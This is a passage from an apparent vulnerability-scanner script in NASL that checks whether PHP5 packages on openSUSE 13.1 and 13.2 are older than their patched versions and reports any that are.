rpm:\"php5-mbstring-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql\", rpm:\"php5-mssql~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql-debuginfo\", rpm:\"php5-mssql-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-opcache\", rpm:\"php5-opcache~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-opcache-debuginfo\", rpm:\"php5-opcache-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", 
rpm:\"php5-pcntl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.6.1~36.1\", 
rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) 
{\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) 
{\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", 
rpm:\"php5-enchant~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird\", rpm:\"php5-firebird~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird-debuginfo\", rpm:\"php5-firebird-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", 
rpm:\"php5-gd~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql\", rpm:\"php5-mssql~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql-debuginfo\", rpm:\"php5-mssql-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", 